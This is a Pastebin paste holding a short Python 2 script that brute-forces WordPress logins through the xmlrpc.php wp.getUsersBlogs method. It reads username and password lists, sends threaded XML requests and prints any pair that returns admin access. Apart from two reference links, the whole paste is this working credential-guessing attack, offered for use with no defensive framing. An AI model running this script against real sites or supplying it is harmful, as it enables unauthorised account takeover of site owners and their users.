Advertisement
krot

WordPress xmlrpc

Dec 21st, 2016
421
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.26 KB | None | 0 0
  1. http://blog.tigertech.net/posts/blocking-wordpress-xmlrpc-password-attempts/
  2. https://codex.wordpress.org/XML-RPC_wp#wp.getUsersBlogs
  3.  
  4. import futures
  5. import requests
  6. from Queue import Queue
  7.  
  8. XML_URL = "http://localhost/xmlrpc.php"
  9. USER_FILE = "username.txt"
  10. PASS_FILE = "password.txt"
  11. THREAD_NUM = 20
  12.  
  13. data = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>"""
  14. task = Queue()
  15.  
  16.  
  17. def attack():
  18. while not task.empty():
  19. username = task.get()
  20. pass_txt = open(PASS_FILE)
  21. for password in pass_txt:
  22. req = requests.post(XML_URL, data=data % (username, password.rstrip("\n")))
  23. if &#039;isadmin&#039; in req.text:
  24. print "[+] username = " + username + " password = " + password
  25. break
  26. print "[-] username %s finished" % username
  27.  
  28.  
  29. def main():
  30. user_txt = open(USER_FILE)
  31. for username in user_txt:
  32. task.put(username.rstrip("\n"))
  33. executor = futures.ThreadPoolExecutor(max_workers=THREAD_NUM)
  34. for i in range(THREAD_NUM):
  35. executor.submit(attack)
  36. executor.shutdown()
  37.  
  38. if __name__ == "__main__":
  39. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement